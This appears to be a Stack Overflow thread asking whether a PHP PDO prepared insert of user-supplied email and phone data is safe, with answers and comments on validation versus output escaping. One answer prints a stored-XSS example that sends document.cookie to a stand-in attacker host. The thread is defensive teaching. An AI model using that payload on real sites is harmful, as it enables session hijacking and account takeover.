# Is this PDO script safe

Tags: php, pdo

I see that there are a lot of articles on this, but in general what are the best practices when using PDO with user generated data?

I assume that this is safe.

```
<? 
$user_phone = $_POST['user_phone'];
$user_email = $_POST['user_email'];

$insert = $db->prepare('INSERT INTO user (user_email, user_phone) 
                        VALUES (:user_email, :user_phone)');

$insert->bindValue(':user_email', $user_email, PDO::PARAM_STR);
$insert->bindValue(':user_phone', $user_phone, PDO::PARAM_STR);

$insert->execute(); 
?>
```

Comment: I think `(user_email, user_phone(` should be `(user_email, user_phone)`, but otherwise looks fine.

Comment: it is in general a good idea to go through this guideline https://www.owasp.org/index.php/Top_10_2013-Top_10

Answer (score 0):

While a user cannot exploit the database by means of injection, it is still vulnerable by other means.

You don't check the validity of the data you put into your database. While it is not exactly required to do so but **if** I would submit this as an email address or phone number:

```
<script>
window.location='http://attacker/?cookie='+document.cookie
</script>
```

And you `echo` this out on your website and visit it, you will be redirected sending me your login cookies and now I can use that data to login as you and if by any chance you're the site admin... The type of attack is called XSS.

And by not checking the validity of the data, there are many ways to do so but take this as an example:

```
$phone = $_POST['user_phone'];
$email = $_POST['user_email'];

if (!filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
    # if this is true, the email address has a correct format.
    # see the filter_var manual for more information.

    if(is_numeric($phone)){
        $insert = $db->prepare(
           'INSERT INTO user (user_email, user_phone) 
            VALUES (:user_email, :user_phone)'
        );

        $insert->bindValue(':user_email', $email, PDO::PARAM_STR);
        $insert->bindValue(':user_phone', $phone, PDO::PARAM_STR);

        if($insert->execute()){
            echo 'success!';
        } else {
            echo 'failed to execute query.';
        }
    } else {
        echo 'phone number is incorrect.';
    }
} else {
    echo 'email is not correct.';
}
```

With this code, any data saved will be valid. It does not say that the email address exists noor the phone number.

Since most XSS attacks rely on `<` to allow a Javascript execution, it is negated cause the `<` character is not allowed in an email address.

My advice, check if the data is what you expect it to be before saving it instead of storing it and fix the security issues later.

Comment: A permanent XSS as you explain will happen if he doesn't escape the output not the input. `echo $login` is vulnerable.

Comment: @Sylwit `If he doesn't escape the output, not the input?` Please do explain instead of directly downvoting. If I would escape the input, save it, I would not have to escape the output? Secondly you sanitize before saving.

Comment: I think you should clarify what you mean by "clean your data before saving it instead of storing it and sorting it out later".  From my understanding, I disagree.  I do think you must **sanitize** (remove invalid characters) your data before you store it.  Then you must **escape** when you display. Escaping in a web app is not the same as in a desktop app. There is my nuance that would make me disagree with you answer. I did not downvote though.

Comment: @Maxime already did, and in this *specific* use-case it is not required to escape on output, one of the perks of checking data before saving.

Comment: I disagree. You sanitized the email but you did not validate or sanitized the phone.  So, displaying the phone NEEDS a proper escape.  Simply outputting the phone without escaping could cause a XSS problems.

Comment: @Maxime, Who is displaying anything? I just say the phone number is incorrect and nothing will be saved if `is_numeric()` returns false. And it will return false on any non-digit. Though you could still add hex code in there (php < 7), but just a number none-the-less so it does not breach the security. But since phone formats vary between country's a regex by country better anways, but that's besides the point ;)

Comment: Sir, you edited your answer so many times. You were not validating the input and were exposed for a potential XSS attack. Now that you validate both values, your code follows what your initial statement that was: "clean your data before saving it".  It wasn't before. We're good.

Comment: `is_numeric()` isn't the same as `ctype_digit`. Often the latter is a better check for a string comprised only of number characters.  There are fringe case valid email addresses than may contain any character inside of double quotes before the `@`.